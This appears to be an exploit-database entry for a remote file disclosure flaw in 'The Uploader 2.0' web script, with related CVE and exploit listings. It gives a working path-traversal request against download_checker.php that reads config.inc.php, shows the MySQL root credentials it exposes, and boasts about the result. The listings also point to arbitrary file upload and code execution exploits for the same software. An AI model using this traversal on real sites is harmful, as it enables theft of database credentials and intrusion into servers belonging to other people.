# Title: The Uploader 2.0 Remote File disclosure Vulnerability # Author: Stack http://server/the_uploader/api/download_checker.php?filename=../config.inc.php next open the config.inc.php file and you got the MySQL configuration ( user & password ) :d //MySQL configuration and connection functions $main['host']="127.0.0.1"; $main['user']="root"; $main['pass']="jH445Ui"; $main['dbnm']="jkL_database";
Related Exploits
Matching CVEs (1): CVE-2009-4816Matching OSVDBs (1): 61270
Other Possible E-DB Search Terms: The Uploader 2.0, The Uploader
| Date | D | V |
|
Title | Author |
|---|---|---|---|---|---|
| 2009-12-22 |  |
|
10594 | The Uploader 2.0 - Arbitrary File Upload | Master Mind |
| 2010-06-22 | |
|
13966 | The Uploader 2.0.4 - Remote File Disclosure | Xa7m3d |
| 2012-02-23 | |
|
18518 | The Uploader 2.0.4 - (English/Italian) Arbitrary File Upload / Remote Code Execution (Metasploit) | Danny Moules |